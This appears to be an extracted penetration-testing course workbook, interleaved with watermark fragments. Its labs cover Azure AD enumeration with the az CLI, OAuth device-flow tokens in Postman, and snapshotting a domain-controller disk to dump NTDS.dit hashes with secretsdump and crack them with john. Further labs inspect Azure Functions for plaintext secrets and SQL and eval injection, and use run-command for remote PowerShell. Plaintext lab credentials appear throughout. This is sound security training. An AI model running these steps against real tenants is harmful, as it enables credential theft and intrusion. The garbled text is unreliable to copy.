The tooling for much of these items do not necessarily exist yet as many of these technologies are nacent. The
au
more that we see these technologies be attacked, the greater our toolsets will be.
<p
s
rri

Ha
gg
PACU provides us with the capability to automate the testing of an AWS account's set of permissions. Quite often
re
the complexity of the AWS System may leave the administrators with a sense of security with the proliferation of
G
tokens and of API keys.

:
To
d
n se
ce
Li
live

Lab 3.1: Azure AD and RBAC
Roles
3e1e3b497543e6c11ac8e4188959c93e
Brief Intro
20
20
We will be playing around with Azure AD and the di erent RBAC roles that exist. To understand a bit of the Azure AD
,
28
Permissions and the di erent RBAC roles. We will be using the Azure CLI tools that we have installed as well as the Azure
ly
Portal to look at the permissions on the system.
Ju
>
There are several ways we can manage azure resources:
om
_c
Manage the resources through the Web URL
ok
Manage the resources the az cli, cross platform doesn't require powershell
Manage the resources through .NET. 23169600 @

ou
tlo
Manage the resources through the PowerShell AzureRM and Azure libraries, does require powershell
For the majority of our tools we will be using the az cli tool, we will however, also be using the web interface as, and we will
66
also show you how to get a windows command execution in an up coming exersize.
s1
ne

ljo
Gregg Harris
au
<p

s
rri
The AZ CLI will need to be installed and working

Ha
The Firefox browser will need to installed and working

gg
Try It Yourself
re
: G
To

d
se
1. Use the az login tool to login via a webbrowser and through the cli.
n
2. Use tool to list out users and to list out the roles that the users have to resources.
ce
3. List out the virtual machines in the system, their associated disks, their associates snapshots, and their associates
Li
backups
live
4. Login via the browser and list out the Azure AD Domain Services Resources.
Walkthrough
Let's open the MATE terminal so that we can launch az

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66

s1
ne
Let's explore the azure login options

ljo
Gregg Harris
au
$ az login -h
<p
s
Here we can see that there are a few options. One option is to use the following option:
rri
Ha
$ az login
gg
re
This would allow us to login using the web browser, it will open Firefox, choose Login as a New user, or if prompted login
G
with the username of

:
To
summer@sec588.com and a password of: SnakeJazz2020

d
n se
ce
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
Once you login, you will not be returned back to the terminal you need to manually click on it to see the successful login:
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
This is just one way to login, but it requires the browsing interface to be availabe. What if you needed a di erent option to
s
rri
login, such as one in which you did not have a webbrowser or GUI fallback option.
Ha
gg
$ az logout
re
G
Here is a di erent login option, where you can pass usernames and passwords over the command prompt:
:
To
$ az login -u summer@sec588.com -p SnakeJazz2020

d
n se
ce
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
Now that we are in, we can attempt to understand what permission we may have for this user.
>
om
First let's take a tour over the di erente Azure Active Directory commands, with Azure Active Dirctory we can see our users
_c
and see some of their pro le information:
ok
$ az ad --help
23169600
If you look there are several 'subcommands' for az ad, such as
@
user
ou
tlo
as well as app and sp . We will use some of
66
these in a bit, let's look at user:

s1
ne
$ az ad user --help
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
n se
ce
Li
live
Now let's take a look at the lists of users on the system, the rst command will show you a json array, it may be di cult for
you to manipulate, instead let's use table format as we can in the second command:
$ az ad user list
$ az ad user list -o table

Now you may notice that this table is rather di cult to work with as is. To make the table more manageable we can x that:
$ az ad user list --query '[].
3e1e3b497543e6c11ac8e4188959c93e
{DisplayName:displayName,UserPrincipalName:userPrincipalName,UserType:userType}' -o table
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
The command above allowed us to manipulate the output by ltering down what is displayed as well as what is displayed by
ne
naming the columns di erent names. The query syntax is from : JMESPath query (http://jmespath.org/tutorial.html
)
ljo
(http://jmespath.org/tutorial.html)
Gregg Harris
au
<p
Now we can see all the users that are on the system. Which ones are guest and which ones are active members. But what
s
permissions do they have in Azure? For this we need a few more queries. We will be look at the Azure roles rst:
rri
Ha
$ az role assignment list

gg
re
Now this list is also in a JSON Array, so let's use the table format to try and get a better idea for the output:
: G
To
$ az role assignment list -o table

d
n se
ce
Li
live
It appears that Summer has a global reader role in Azure. Let's try and see what other resources we may have rights to.
Internal Recon with AZ Tools

Let's talk about internal reconnaissance. How do we know what the most critical assets and items are? Let's try and gure
out a methodology to understand them, rst let's see if we can enumerate Virtual Machines:
$ az vm list -o table --resource-group <class-subdomain>-resources
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Let's manipulate the query to show us:
Ju
>
1. The name of the Virtual Machine
om
2. The resource group of the Machine
3. The provisioning state of the Virtua Machine
_c
4. The Virtual Machine hardware size
ok
$az vm list --query '[]. 23169600 ou
tlo
{Name:name,ResourceGroup:resourceGroup,ProvisioningState:provisioningState,VMSize:hardwareProfile.vmSize}'
@
-o table --resource-group <class-subdomain>-resources
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
It would appear that this environment has a few machines. Some of them are Standard_DS2_V2 , and there may be other
sizes well. You may see names such as dc1 and iis that are clues, but could also not necessarily be a Domain
gg
Controller or IIS server.

re
G
Now compute instances can have disks that you can attach them that form the hard disk of the machine. We can list out
:
To
these disks and see them all.

d
se
az disk list -o table --resource-group <class-subdomain>-resources

n
ce
Li
live
You can see which one of these disks exists, in our case it's one disk per machine, but it could be more, there could even be
orphaned disks . Keep this in mind when look over these disks.

Compute instances have a few options, one option is to backup the entire vm and another option is to use snapshots. We
can list out backups and snapshots using the azure tool if they exist. If they don't exist with enough permissions you can
create one.
3e1e3b497543e6c11ac8e4188959c93e
$ az snapshot list --resource-group <class-subdomain>-resources
20
, 20
28
ly
Ju
>
om
_c
ok
What we see here is a disk that is called 'dc1-disk`. This is potentially a snapshot for the domain controller disk. Given
23169600
enough risk we may be able to get a copy of this disk and pull out domain controller artifacts.
ou
tlo
Now how do we see backups? Backups are stored in a vault, to see the backups you need two pieces, rst you need the
@
'vault name' and you need the resource group. To get the resource groups we are working with you could use the following
66
command again:
s1
ne
$ az vm list -o table --resource-group <class-subdomain>-resources

ljo
Gregg Harris
au
To get the name of the vaults we can list out all vaults:
-resources

Ha
Here we can list out all the vaults and get the name of the vaults we to look at. Armed with this informaion we can construct
gg
our query
re
: G
To
d
se
n
ce
Li
live
$ az backup item list --resource-group <class-subdomain>-RESOURCES --vault-name <Vault name from vault
list command>

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
Understanding the limitations of our tools
>
om
While we have been using az exclusively, not all functions are exposed to az directly. Let's begin by open up firefox
_c
found on the desktop.
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
From here let's open a URL:

re
G
https://portal.azure.com
:
To
From here you will be asked to sign in. You can use the account. At the top of the search bar, you
d
summer@sec588.com
se
type the following in: Azure AD Domain Services .

n
ce
Li
live

Click the sec588.com line and go it will open a tree about the object. We cannot make any major changes to AD Domain
Services but we can see that there is a con guration for it. This is an example of how the portal is slightly di erent than the
CLI tools.
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
Conclusion
23169600 @
ou
tlo
66
This lab is the beginning coursory tour of the az tool, the tool itself can be weilded for both positive system
administration but also for our own use in a penetration test if we understand how to navigate the system. Just like with
s1
aws tool, the az tool is working at the control plane layer and could circumvent some of the traditional controls we
ne
may have put into a system.

ljo
Gregg Harris
au
Why this lab is important

<p
s
rri
Over the next few labs, we will be using this tool to implement our actions, getting familiar with how to use the tool for
Ha
reconnaissance gathering, listing of permissions and more will be critical.

gg
re
:G
To

d
n se
ce
Li
live

Lab 3.2: API's and Postman
3e1e3b497543e6c11ac8e4188959c93e
Brief Intro
20
While we have seen the ways that Azure and Amazon interact with API's using their CLI tools, we can also
interact with many of these environments with the native SDK's. This lab will introduce us to using the Azure API
20
in Postman and by doing so we will:
,
28
ly
1. Learn how the OAuth Flow in Azure works, so that we can later leverage it to nd a higher priviledged
Ju
account.
>
2. See how Device Flow will lead us to using a bearer token. We can later use this type of access for items like
om
Microsoft Graph.
_c
3. Learn how to use postman to import a collection.
ok
ou
tlo
66

s1
ne

ljo
The Firefox browser will need to installed and working
Gregg Harris
au
The Postman system.

<p
s
Try It Yourself
rri
Ha
gg

re
G
1. Use the az login tool to login via a webbrowser and through the cli.
:
To
2. Create a clientSecret using the Postman-APP that is located in the Azure AD App Environment. You can use
the account to create a valid authentication.
d
jerry
se
3. Download the JSON requests from: [http://bit.ly/2TPlWRO].

n
4. Use the tools to create a valid access_token for authentication.

ce
5. See what level of Authentication the API has with the API.
Li
Walkthrough
live

3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne

ljo
Gregg Harris
au
Let's explore the azure login options

<p
s
rri
$ az login
Ha
gg
Once you login, you will not be returned back to the terminal you need to manually click on it to see the
re
successful login:
:G
To
d
nse
ce
Li
live

Log in with the jerry account this time. Record the tenantId value.
Username: jerry@sec588.com
3e1e3b497543e6c11ac8e4188959c93e
Password: HumanMusic2019
From this point we will use the Firefox application to navigate the Azure Portal.
20
20
Log into: http://portal.azure.com .
,
28
ly
Using the Azure Portal search options type the following:
Ju
>
om
Azure Active Directory
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au

om
_c
ok
23169600
Click on the application. Record the following options:
@
ou
tlo
66
Application (client) ID:

s1
ne
Directory (tenant) ID:

ljo
Gregg Harris
au
From here we will now need to create a client secret to be able to connect our postman into our system.
<p
s
rri
Click the Certificates and Secrets button.

Ha
In this screen click New Client Secret .

gg
re
G
Call the Secret: StudentX-Secret .

:
To
d
Make it expires in 1 Year .

n se
ce
Li
live

Important when you click add you will see the Secret ONLY ONCE, copy the value NOW.
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
With these values we can now con gure
23169600
Postman .
@
ou
tlo
66
Open a new browser type and go the following URL:

s1
ne
[http://bit.ly/2TPlWRO]
ljo
Gregg Harris
au
<p
The URL above has a lowercase L and the letter O NOT the number Zero.
s
rri
Ha
When asked choose Check out the WebView .

gg
re
: G
To
d
n se
ce
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
From here RIGHT CLICK 23169600
Download the JSON ou
tlo
and choose Save Link As...
@
66
s1
ne
ljo
Gregg Harris
au

om
_c
ok
23169600 @
ou
tlo
66
s1
ne
From here type:

ljo
Gregg Harris
au
 Import.

:
To
d
Click Choose Files .

n se
ce
Click the Desktop Button and Choose Azure Rest.JSON .

Li
You should now see a Folder on the Left called live

Azure Rest .

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
To log into Azure we will need to perform an OAuth Device Flow Authentication. This will be a two step operation.
s1
In the rst step we will use OAuth device ow to get a Device Flow Authentication token which will be our
ne
bearer token to make valid API requests.

ljo
Gregg Harris
au
Click on the left hand side under the Azure REST Folder: Get AAD Token .
<p
s
rri
Ha
gg
re
:G
To
d
n se
ce
Li
live
Click on the Body button (or tab depending on how you view this). At this point we should be able to see the
Body of the requests. The Body shows us that we need several Environment Variables:

You should see a DropDown containing the words 'No Environment' at the top right-hand side of the Screen.
Click the Eyeball next to it.
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
Under Environment Click Add on the Right. We can now add an Environment. Let's call it: Azure .
ne
ljo
Add the following Environment Variables and ll in the CURRENT Values eld:
Gregg Harris
au
<p
tenantId This is from the previous terminal area where we recorded it

s
rri
Ha
clientId This is the clientId of the Application

gg
This was your student secret you created

re
clientSecret
: G
Leave this blank for now

To
subscriptionId
d
se
bearerToken Leave this blank for now.

n
ce
Li
resource This needs to be set to: https://management.azure.com as we will be testing access to this
resource.
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
Note the capitalization. The rst word is all lowercase and the second word begins with an uppercase letter. Make
au
sure that none of the variables have spaces BEFORE or AFTER the word.
<p
s
rri
Ha
Select Add and then click the X at the top corner to close out the Environments screen completely.
gg
Now click the tab for tests .

re
G:
Once you click send you will see a response with an access_token .
To
d
nse
ce
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
Copy this value, and click the Eyeball to enter it in as the bearerToken .
ok
subscriptionId:
23169600 @
ou
tlo
Now we will need to get a subscriptionId. To get this open a terminal and type the following commands to get the
66
s1
az account show --query id

ne
ljo
Go back into the environment variables and ll in the following values:
Gregg Harris
au
<p
bearerToken This is the access_token value, becuase it has a dot (.) you cannot just doubleclick the value to
s
copy it. You must highlight it.

rri
Ha
subscriptionId which is the value above.

gg
re
G
Armed with these values we can now formulate a new API response. Underneath the the request for Get AAD
:
Token you should see a Get Resource Groups request. Choose it.
To
d
se
Once it is open click Headers . You will now see some unresolved variables. Let's input these.
n
ce
Li
Read the body response carefully:
live

3e1e3b497543e6c11ac8e4188959c93e
{
"error": {
"code": "AuthorizationFailed"
}
}
20
, 20
28
ly
Ju
Please note, this is not Authentication failed, this is Authorization failed, which means authentication
passed, but you are not scoped to access this resource. The resource is an Azure AD Resource. Later today we
>
om
will be using these keys to access O ce Resources.
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
Conclusion
gg
While this lab did not yield exploitation it builds on the fact that today we will be using the Postman tool in a new
re
G
and di erent way. In order to successfully use the tool we need to understand how to build programmatic access
:
to Azure, and this lab demonstrates how to successfully do this by using the Device Token Flow of SAML to
To
authenticate.
d
se
n
ce
Li
live

Lab 3.3: Azure VMs
3e1e3b497543e6c11ac8e4188959c93e
Brief Intro
Using the capabilities of the system, we may be able to leverage the ability of Azure to Backup and Restore disks
20
to abuse this process and obtain additional information about local resources. This lab demonstrates how to use
20
the system to gain access to hashes in the SAM Database and the NTDS.DIT for a Domain Controller.
,
28
ly
Ju
>
om
This lab requires a few items:
_c
ok
The az tool
The Storage Explorer tool 23169600

A login to the system using the password for the jerry @
ou
tlo
account.
A connection to the internet

66
s1
Try It Yourself
ne
ljo
Gregg Harris
au
To try this out yourself without any help.

<p
1. Create a VM Snapshot of the labeling it with your number.

s
dc1-disk1 student-X
rri
2. Convert that snapshot to a disk

Ha
3. Mount that disk in a Linux Virtual Machine

gg
4. Use the secretsdump.py tool that ships with impacket to extract the local administrator hash.
re
G
Walkthrough
:
To
d
se
Making Snapshots
n
ce
Let's open the MATE terminal so that we can launch Azure Storage Explorer.
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne

ljo
Gregg Harris
au
Let's explore the azure login options.

<p
s
rri
$ cd /opt/StorageExplorer
Ha
gg
The Storage Explorer tool is an Electron Based tool so it may take a few minutes to launch.
re
: G
Please note Storage Explorer is not the most stable of applications and may require you to run the command
To
more than once. If you receive a .NET 2.2 error, run the application again.
d
n se
ce
$ ./StorageExplorer
Li
Once this opens, you log in as jerry . live

If you need account credentials to use the username is: jerry@sec588.com and password:
HumanMusic2019 .

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
The Azure Storage Explorer is a menu-driven system where you can view storage blobs and storage
_c
environments. You can look through the system and see what you have available to you.
ok
23169600
Once you've explored a bit, let's navigate the following location:
@
ou
tlo
66
Pay-as-you-go-XXXX (jerry@sec588.com) | Disks | <class-subdomain>-resources

s1
ne
Here you, there are a few disks, locate the one called dc1-disk1, click the button at the top that says 'Create
ljo
Snapshot.' Call the Snapshot:
Gregg Harris
au
<p
dc1-disk1-student-X
s
rri
Ha
Wait until the job is 'done,' this may take a few minutes.
gg
re
: G
To
d
n se
ce
Li
live
Converting Snapshots to Disk

Once you have built a snapshot, you can attach this snapshot to a new system. This system could be Windows, or
it could be Linux. To facilitate future labs and give us attackers more options potentially is we will be using a Linux
VM to facilitate our work.
3e1e3b497543e6c11ac8e4188959c93e
Note during a real engagement we may wish to hide our activities and given the number of Windows vs. Linux
systems deployed we may choose to hide amongst the masses by using whatever is more common.
20
20
The rst item is we need to get the Snapshot ID of our snapshot:
,
28
snapId=$(az snapshot show --name dc1-disk1-student-X --resource-group <class-subdomain>-
ly
Ju
resources --query [id] -o tsv)
>
om
To check if this command worked use:
_c
ok
echo $snapId
23169600 @
ou
tlo
66
s1
ne
The snapshot can be converted with the following command:

ljo
Gregg Harris
au
-resources --name dc1-disk1-student-X-disk --

sku Standard_LRS --size-gb 128 --source $snapId
s
rri
Ha
gg
re
G
With the disk available, we can now create a VM, given enough permissions, we can create a VM and mount the
:
To
disk. What about if this is just a backup/restore account? It probably would have this capability.
d
se
Converting Snapshots to Disk

n
ce
Li
You may need to log in as Jerry if you have yet not done this or your session has expired:
$ az login -u jerry@sec588.com -p HumanMusic2019

live
The next component of this will be to mount the disk to a VM, with the disk mounted we can run some attacks on
it. Could this potentially be a Domain Controller, if so we can attempt to extract the ntds.dit le of it.

az vm create --name studentX-hack --attach-data-disk dc1-disk1-student-X-disk --admin-username
studentX --resource-group <class-subdomain>-resources --public-ip-address-allocation dynamic --
image ubuntults --generate-ssh-keys
3e1e3b497543e6c11ac8e4188959c93e
Once this the Virtual Machine is created you you can do the following:
A set of keys are created for you if they are already not on the system.
20
20
~/.ssh/id_rsa and ~/.ssh/id_rsa.pub
,
28
A Public IP Address for your VM is provided to you in the JSON array
ly
Ju
>
You should now be able to login to the system by typing the following:
om
_c
$ ssh StudentX@<publicIpAddress>
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
SecretsDump.py
s
rri
Once we have a valid login to our VM, let's perform the following tasks:
Ha
gg
1. Mount the disk to a Directory

2. Download the secretsdump.py le
re
G
3. Run secretsdump against the target machine.

:
To
From within the VM let's nd the disk:

d
nse
ce
$ dmesg | grep sd
Li
sda and
live
What this prints out is all of the SD (SCSI Drives) that are available, by default there are two that ship with this
VM: sdb . These are already mounted. Are there any other? The rst available disk may be sdc

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600
At this mount, we can as root create a mount directory and mount the SECOND
tlo
sdc
second? In modern windows for EFI purposes, the second partition is more than likely the
ou
@ partition. Why the
C:\ drive.
66
To verify the contents of any disk in the future, perform an fdisk -l /dev/sdX substituting X for the letter of
s1
the disk.
ne
ljo
Gregg Harris
au
$ sudo mkdir /mnt/disk1

<p
s
rri
$ sudo mount /dev/sdc2 /mnt/disk1

Ha
The errors about the machine not able to mount the disk as the disks are not cleanly unmounted, can be safely
gg
ignored.
re
: G
To
d
n se
ce
Li
WindowsAzure and AzureData exist:

live
If you wish to validate that it is mounted, check the directory structure and make sure that Windows and
$ ls /mnt/disk1/

Let's get secretsdump.py on our system. What is secretsdump.py ? The secretsdump.py script is a tool
that ships as part of Impacket. While Impacket has many features, it also has this the tool that can attack live and
o ine systems, looking through the di erent les on the disk to extract hashes. What les? SAM Database,
Registry's, and even ntds.dit.
3e1e3b497543e6c11ac8e4188959c93e
Impacket requires the pip binary needs to be present on our system, which ships with the python-pip
package.
20
, 20
28
ly
Ju
>
om
_c
$ sudo apt-get update -y && sudo apt install python-pip -y
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
Once installed, we can then pull down the impacket repository.

s
rri
Ha
$ git clone https://github.com/SecureAuthCorp/impacket

gg
This clones the impacket repository that contains secretsdump.py . We can now use pip to install impacket as
re
a library for us to use the script.
G
secretsdump.py
:
To
Switch directory into the directory that contains impacket

d
n se
$ cd impacket
ce
Li
live
To install impacket type:

~/impacket$ pip install .
The pip install takes a few minutes to build. Once done you will then be able to drop into the examples directory:
3e1e3b497543e6c11ac8e4188959c93e
~/impacket$ cd examples
~/impacket/example$
20
20
Extracting the Hashes
,
28
Here is the command that we can use to dump secrets:
ly
Ju
>
~/impacket/example$ python secretsdump.py -system /mnt/disk1/Windows/System32/config/SYSTEM -
om
ntds /mnt/disk1/Windows/NTDS/ntds.dit -outputfile /tmp/hashes -hashes LMHASH:NTHASH LOCAL
_c
ok
What do these switches do?
-system
23169600
The location of the SYSTEM HIVE
@
ou
tlo
66
The location of the ntds.dit le

s1
-ntds
ne
ljo
LOCAL This is a local system, not a remote system
Gregg Harris
au
<p
-hashes This is to ouput the hashes in the format LMHASH:NTHASH

s
rri
The location to output the hashes to

Ha
-outputfile /tmp/hashes
gg
Using this tool, we can now extract at least some hashes:

re
: G
To
d
n se
ce
Li
live
We at least now have the Administrator hashes to the VM, which may be used in other places or to get us further
into the environment.

IF YOU HAVE TIME
Once you have hashes, you may wish to crack them with a password cracking tool. The password cracking tool
used is john .
3e1e3b497543e6c11ac8e4188959c93e
Copy the contents of /tmp/hashes.ntds to your local system. Even a clipboard copy is ss cient. The example
below has you copying it to a le called /tmp/hashes on YOUR local system.
20
20
When complete run the following commands:
,
28
/opt/johntheripper/john --format=NT --wordlist=/home/sec588/files/wordlists/rockyou.txt
ly
/tmp/hashes
Ju
>
om
You should now have a list of passwords used in these password dumps.
_c
ok
Conclusion
23169600 ou
tlo
This lab provided you a way to look at how Storage and Backup operations can be abused to gain unauthorized
access to a system. We performed an attack to show how to obtain the hashes themselves. Using the hashes and
@
using them to move around a network is a discussion for the SEC560 class environments. For now, this is a good
66
roadmap for you to follow, given the right level of permissions.

s1
ne

ljo
Gregg Harris
au
<p
This lab is important as quite often, systems administrators build a backup/restore capability somewhere in the
s
system without thinking through the implications of such permissions. Does this account have the capability to
rri
snapshot a disk? Possibly. Does the account have the ability to verify and test the authenticity of the disk? Maybe.
Ha
To expedite our labs, we did everything from within the cloud, but this does not mean that backing up a VHD and
gg
downloading wouldn't also be possible. Keep this in mind when working on Azure Environments.
re
G
:
To
d
se
SANS SEC560: Network Penetration Testing and Ethical Hacking (http://www.sans.org/sec560)

n
ce
Li
live

Lab 3.4: Attacking Azure
3e1e3b497543e6c11ac8e4188959c93e
Functions
20
Brief Intro
, 20
28
While Microsoft Azure does provide 'Serverless' Functions, the type of functions that they support are starkly
ly
di erent than the Amazon Lambda Functions. While Amazon Lambda functions are container restricted
Ju
functions that do not easily see other functions, the Microsoft Serverless functions are very di erent. The
>
system uses an open source framework known as Project Kudu. The project is found on
om
[https://github.com/projectkudu/kudu]. We are going to explore how Azure Functions work with each other and
_c
the di erences in the system.
ok
ou
tlo
66
1. Only Firefox is required for this lab.

s1
ne
Try It Yourself
ljo
Gregg Harris
au
<p

s
rri
Log into the Azure Portal as Jerry@sec588.com

Ha
gg
Find the Azure Functions Area, and nd the resource group called: shared-resource-group . The function
re
name is called shared-resource-function-app
:G
To
You will notice that Functions is now using the new style of Functions but we can switch this back to "classic
d
se
experience"
n
ce
Li
live
Answer the following questions:

1. Which one of these functions has a Username and Password in the PlainText files ?
2. In Which Directory within D:\home is used to store secrets if any are listed? ?
3e1e3b497543e6c11ac8e4188959c93e
3. Inside of which function in the Manage Area contain Secrets from the Vault? ?
BONUS: There is a vulnerability in several of the functions, what are the vulnerabilities? ?
20
20
Challenge Area Walkthrough
,
28
ly
Ju
Let's take a look at the dev site open up Firefox and navigate to [http://portal.azure.com].
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
G
We will log in with the jerry@sec588.com account in which his password is HumanMusic2019 .
:
To
d
We will be exploring the Azure Functions. Type in the search bar.

se
Function
n
ce
From here you will click on the shared-resource-function-app. This application has several 'Functions'. Click on
Li
the HttpTrigger3 .
live
This particular Function is part of a larger 'application'. In the Lambda world this particular Application would
have isolated trigger functions. Let's explore how this is vastly di erent in Azure.

Click on the Console Button on HTTPTrigger4. Here you will see that the Application is hosted on the D:\
drive of the Azure Function Application.
3e1e3b497543e6c11ac8e4188959c93e
Let's explore what would happen if someone had command execution to this Application.
Type the following command:
20
set
,20
28
ly
Ju
>
om
_c
Notice that there are
ok
many environment variables on here. Let's see what other directories we can nd.
Currently the user is in:

23169600 @
ou
tlo
66
D:\home\site\wwwroot\HttpTrigger3
s1
ne
ljo
Type cd ..
Gregg Harris
au
<p
If you type dir you will see all of the les in the repository.
s
rri
Let's now look at the di erent output items:

Ha
gg
Here you will see four trigger functions.

re
G
Your job is to answer the following questions ONLY using the console in the GUI to simulate an attacker with
:
To
command line injection in an application:

d
se
n
Remember in Windows type is the equivalent of cat.

ce
Li
1. Which one of these functions has a Username and Password in the PlainText les?
live
2. In Which Directory within D:\home is used to store secrets if any are listed?
3. Inside of which function in the Manage Area contain Secrets from the Vault, this one can be done in the GUI.
BONUS: There is a vulnerability in several of the functions, what are the vulnerabilities?
Answers

The answers below:
1. If you use type the following le: D:\home\site\wwwroot\HttpTrigger1\index.js You will see a
3e1e3b497543e6c11ac8e4188959c93e
username and password at the top of the le.
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
2. D:\home\data\Functions\secrets is where the secrets are decrypted and stored.

ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
G
:
To
d
nse
ce
Li
3. If you use the GUI and navigate to

UsernameFromVault and live
HttpTrigger4 and then Manage you will see two values:
PasswordFromVault . If the vault is used these values will be decrypted.

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
4. There are 2 vulnerabilities:
ok
23169600
SQL Injection in HttpTrigger1, speci cally in this eld:
@
ou
tlo
var query="select amount,date from purchases
p " + "inner join cards c " + "on p.card_id = c.card_id " + where c.cardNumber '" = cardNum
66
"'";
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
In the NodeJS HttpTrigger3 there is on body statement that will cause Server Side Javascript
gg
eval()
Injection (SSJI).
re
G:
To
d
n se
ce
Li
Conclusion
live
This lab illustrates that once a serverless function in a singular application is compromised the entire application
will act like a monolithic applicaion in terms of security. There is barely any access and authorization control
between functions on the disk and this is very di erent than other serverless functions that exist. This means

that application architects need to keep this in mind and attackers need to understand how loose the restrictions
are.
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
nse
ce
Li
live

Lab 3.5: Running
3e1e3b497543e6c11ac8e4188959c93e
Commands in a VM
20
Brief Intro
,20
28
While running through an engagement or penetration testing, you may nd yourself wishing to run commands
ly
on a remote system. This course doesn't focus on the commands to run themselves, like a SEC560 or SEC660
Ju
course. While some courses may be looking at having you execute movement laterally between systems on the
>
same WAN or LAN environment, this course focuses on alternative methods to run commands on several
om
remotely available cloud system.
_c
ok
The techniques that we will focus on that are speci c to Microsoft Azure are:
Extensions on remote systems

23169600 @
ou
tlo
RunCommand and using Powershell
66
s1
There are also methods to do this with almost any cloud provider, as this is base functionality.
ne
ljo
Gregg Harris
au

<p
s
Internet access and Access to our Azure Portal is required for this lab. The Virtual Machine from Lab 3.3 needs
rri
Ha
to be still available.
gg
re
On Demand students should ensure they have this virtual Machine available, if not, they should recreate it.
G:
To
Try It Yourself
d
n se
ce

Li
1. Use the run-command in the az live

CLI to execute a set of queries
2. The queries execute a series of PowerShell commandlets, tell me directory the script executes from.
3. Execute a PowerShell script to add a user.
4. Execute the Custom Script Extension on the studentX-Hack VM. Use the Azure Portal to do this.
5. Execute a shell script; the script shell should be a bash script runs an an elevated command like cat
/etc/shadow

Walkthrough
CLI tools and run-command.

3e1e3b497543e6c11ac8e4188959c93e
Let's open the MATE terminal so that we can launch az:
20
,20
28
ly
Ju
>
om
_c
ok
23169600 ou
@
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg

re
G
Validate that you are logged-in as Jerry:

:
To
d
se
$ az account show
n
ce
Li
If you are not, use the previous exercises to log in as jerry
live
Let's validate that we can run the azure commands to list out virtual machines:
$ az vm list -o table

We should see MULTIPLE machines, at a minimum:
1. The DC
3e1e3b497543e6c11ac8e4188959c93e
2. An IIS Server
3. A Dockerhost
4. One or more Student VM's
20
Let us explore the run-command option that is presented to us.
,20
If we execute the command below, we will see options that can be arguments to the command. Some of these
28
are far more attractive to us than other arguments.
ly
Ju
>
$ az vm run-command
om
_c
How does run command work? The az vm run-command has a list of commands that can be run, there is a
ok
limited set of options.
23169600
RunPowerShellScript : Runs a powershell script
@
ou
tlo
66
EnableRemotePS : Enable Remote PowerShell

s1
ne
EnableAdminAccount : Checks if the Local Admin Account is available, if it is, enable it

ljo
Gregg Harris
au
<p
IPConfig : Runs IP Con g

s
rri
RDPSettings : Changes the RDP Settings to enable it or suggest a change

Ha
gg
ResetRDPCert : Resets the RDP Certi cate to a new one

re
G
SetRDPPort : Changes the RDP Port

:
To
d
se
Of all these commands a few may be of interest: RunPowerShellScript and EnableRemotePS

n
ce
Given that we have the right to make speci c changes, we have the potential to apply the extension labeled
Li
RunPowerShellScripts
bevy of scripts that we can run. live
which would provide us a mechanism to execute PowerShell remotely. There is a
One option? How about if we run powercat.ps1 ? Maybe we can use PowerShell empire? Some of these
options may trip host-based EDR. If you interested in either tool navigate to:

PowerCat PS1 (https://github.com/besimorhino/powercat) PowerShell Empire (https://github.com/BC-SECURITY/Empire/)
What's another option? How about if we run some simple commands to prove the power of the system.
3e1e3b497543e6c11ac8e4188959c93e
1. List the current directory
2. Add a StudentX user
20
Let's see the syntax of the command:
, 20
28
az vm run-command invoke --command-id RunPowerShellScript --name dc1 -g <class-subdomain>-
ly
resources --script '$scriptDir = Get-Location; Write-Host "Current Dir is $scriptDir"'
Ju
>
This command does the following:
om
_c
--name dc1 : Run it on dc1
ok
23169600
-g <class-subdomain>-resources : Our Class Resource group
@
ou
tlo
66
--command-id RunPowerShellScript : Option to run a PowerShell script

s1
ne
